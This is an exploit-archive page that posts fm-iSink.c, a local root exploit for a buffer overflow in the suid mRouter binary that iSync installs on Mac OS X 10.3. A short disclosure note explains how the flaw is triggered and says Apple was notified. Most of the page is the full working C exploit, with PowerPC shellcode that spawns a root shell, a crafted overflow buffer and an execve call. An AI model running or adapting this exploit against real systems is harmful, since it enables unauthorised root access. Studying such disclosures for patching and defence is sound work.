exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

fm-iSink.c

fm-iSink.c
Posted Jan 25, 2005
Authored by nemo

Local root exploit for mRouter installed by iSync on Mac OS X 10.3.

tags | exploit, local, root
systems | apple, osx
SHA-256 | 9a814a90dbb6e5458ed265b55264c5bf185da8f2b4e2f51e6fe813505c80c98a

fm-iSink.c

Change Mirror Download
Hello everyone, a buffer overflow flaw has been discovered in the  
mRouter suid root binary installed by iSync in OS X 10.3 by default.

Program: /System/Library/SyncServices/SymbianConduit.bundle/Contents/
Resources/mRouter
Impact: Privilege Escalation (root access euid=0)
Discovered: 12th January, 2005

The mRouter binary's buffer overflow is triggered by using the -v and
-a switches, and sending a buffer of 4096 bytes. Although I was unable
to successfully exploit it because of the call to seteuid(501) early in
the binary, nemo had no problem. He released a proof-of-concept that
resolves this problem and results in euid=0.

Apple has been notified of this bug.

nemo's Exploit:

<------------ fm-iSink.c ----------->

/*
* fm-iSink.c
* overflow in mRouter, suid binary used by iSync, on OSX <= 10.3.7
*
* written by -( nemo @ felinemenace.org )-
*
* _,'| _.-''``-...___..--';)
* /_ \'. __..-' , ,--...--'''
* <\ .`--''' ` /'
* `-';' ; ; ;
* __...--'' ___...--_..' .;.'
* fL (,__....----''' (,..--''
*
* http://pulltheplug.org and http://felinemenace.org.
*
* Bug discovered by Braden Thomas. Exploit by nemo.
*
* -( need a challenge...? )-
* -( http://www.pulltheplug.org )-
*/

#include <sys/types.h>
#include <string.h>
#include <unistd.h>

#define VULNPROG
"/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/
mRouter"
#define MAXBUFSIZE 4096

char shellcode[] = // Shellcode by b-r00t, modified by nemo.
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68";

char filler[MAXBUFSIZE];

int main(int ac, char **av)
{
unsigned int ret = 0xbffffffa - strlen(shellcode);
char *args[] = { VULNPROG, "-v", "-a", filler, NULL };
char *env[] = { "TERM=xterm", shellcode, NULL };

memset(filler,(char)'A',sizeof(filler));
memcpy(filler+MAXBUFSIZE-5,&ret,4);

execve(*args, args,env);

return 0;
}

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close